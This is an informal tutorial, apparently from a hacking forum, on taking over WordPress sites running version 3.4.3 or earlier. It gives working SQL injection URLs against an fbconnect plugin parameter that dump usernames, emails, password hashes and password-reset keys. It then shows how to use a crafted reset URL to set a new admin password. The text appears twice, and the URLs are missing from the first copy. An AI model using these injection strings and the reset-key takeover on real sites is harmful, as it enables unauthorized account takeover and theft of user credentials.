How to Hack a Wordpress Site V=3.4.3
only on wordpress <= 3.4.3
Ok so u have a wordpress hash which is uncrackable or you are too lazy to try.
Here Is a method you can use to hack it without cracking the hash.
Requirments:
*. Sqli Vulnerable Wp Site
*. WP version <= 3.4.3
k lets assume we have an sqli on this site http://target.com/?fbconnect_action=myhome&fbuserid=1 and we have injected it with the following and could see the email id, username & password
First go to http://target.com/wp-login.php
Now click on Lost your password ?
Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.
Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well.
we will be getting the user activation key by sqli this is what its all about.
Add column name user_activation_key to extract
Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username
Now you will be able to login to site.
only on wordpress <= 3.4.3
Ok so u have a wordpress hash which is uncrackable or you are too lazy to try.
Here Is a method you can use to hack it without cracking the hash.
Requirments:
*. Sqli Vulnerable Wp Site
*. WP version <= 3.4.3
k lets assume we have an sqli on this site http://target.com/?fbconnect_action=myhome&fbuserid=1 and we have injected it with the following and could see the email id, username & password
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--k lets start pwning
First go to http://target.com/wp-login.php
Now click on Lost your password ?
Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.
Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well.
we will be getting the user activation key by sqli this is what its all about.
Add column name user_activation_key to extract
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--Now you will be able to see the activation key
Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HEREeg:- http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin Now the wordpress will ask u for ur new password enter your desired password & click change.
Now you will be able to login to site.
